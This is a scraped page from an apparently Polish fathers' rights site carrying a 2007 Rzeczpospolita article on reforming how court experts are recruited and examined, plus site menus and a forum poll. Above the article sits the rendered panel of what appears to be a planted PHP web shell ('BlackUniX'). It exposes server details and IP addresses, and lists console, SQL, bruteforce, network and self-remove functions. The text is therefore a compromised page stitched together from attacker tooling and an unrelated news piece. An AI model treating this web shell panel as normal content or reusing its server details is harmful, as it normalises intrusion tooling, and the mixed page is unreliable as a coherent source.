W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 07:04:17
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.85.115
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Biegły sądowy dobierany na nowych zasadach
11.12.2007.
Często ich opinie przesądzają o wyroku.O zmianie zasad rekrutacji i weryfikacji biegłych w Ministerstwie Sprawiedliwości mówi się od dwóch lat. Dziś coraz poważniej myśli się, by wprowadzić u nas rozwiązania zbliżone do obowiązujących w Austrii.
Biegli mają być też skuteczniej sprawdzani merytorycznie. Dotychczas weryfikowanie ich kwalifikacji zawodowych odbywało się na podstawie przedłożonych zaświadczeń o wykształceniu. Teraz kandydat zdawałby egzamin komisyjny z udziałem przedstawicieli organów sprawiedliwości.

Będzie się też sprawdzać, czy może się wykazać odpowiednio długim doświadczeniem zawodowym w specjalizacjach, w których ubiega się o wpis. Przedstawienie jedynie zaświadczeń organizacji zawodowych nie wystarczy, bo z doświadczenia wiadomo, że głównym ich zadaniem jest (i powinno być) reprezentowanie interesów swoich członków.

Aby uniknąć niekomfortowej dla organizacji konieczności wydawania obiektywnych zaświadczeń, rozważa się możliwość wprowadzenia szczególnego rodzaju egzaminu komisyjnego. Na czele komisji powinni stanąć sędzia i dwóch egzaminatorów merytorycznych. Funkcję taką w wielu przypadkach mogliby sprawować pracownicy Instytutu Ekspertyz Sądowych.

Egzamin powinien również sprawdzać umiejętność sporządzania opinii sądowych, znajomość istotnych regulacji prawnych dotyczących wykonywania czynności biegłego przed sądem oraz tzw. ogólną wiedzę sądową.

    Eksperci od specjalistycznej wiedzy

    Wśród 18 tys. biegłych, których nazwiska widnieją dziś na listach sądów okręgowych, są przeróżni specjaliści.

    Najwięcej – z nauk medycznych, techniki samochodowej i ruchu drogowego, wyceny nieruchomości, księgowości, finansów i badań kryminalistycznych. Najmniej – z filatelistyki, płetwonurkowania, akustyki, antropologii, kostiumologii czy kynologii. Jeśli znajdzie się dziedzina, w której nie ma biegłego, sądy mogą korzystać z wiedzy specjalistów pracujących w różnego rodzaju instytutach, uczelniach itp. W praktyce sądowej o powołaniu biegłego spoza listy decyduje sąd w konkretnej sprawie. Nie ma wyraźnego przepisu nakazującego w pierwszej kolejności dopuszczanie dowodu z opinii biegłych z listy biegłych sądowych. Kontrola sprawowana przez prezesów ma jedynie charakter administracyjny.

Masz pytanie, wyślij e-mail do autorki: Ten adres e-mail jest ukrywany przed spamerami, włącz obsługę JavaScript w przeglądarce, by go zobaczyć
Źródło : Rzeczpospolita
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.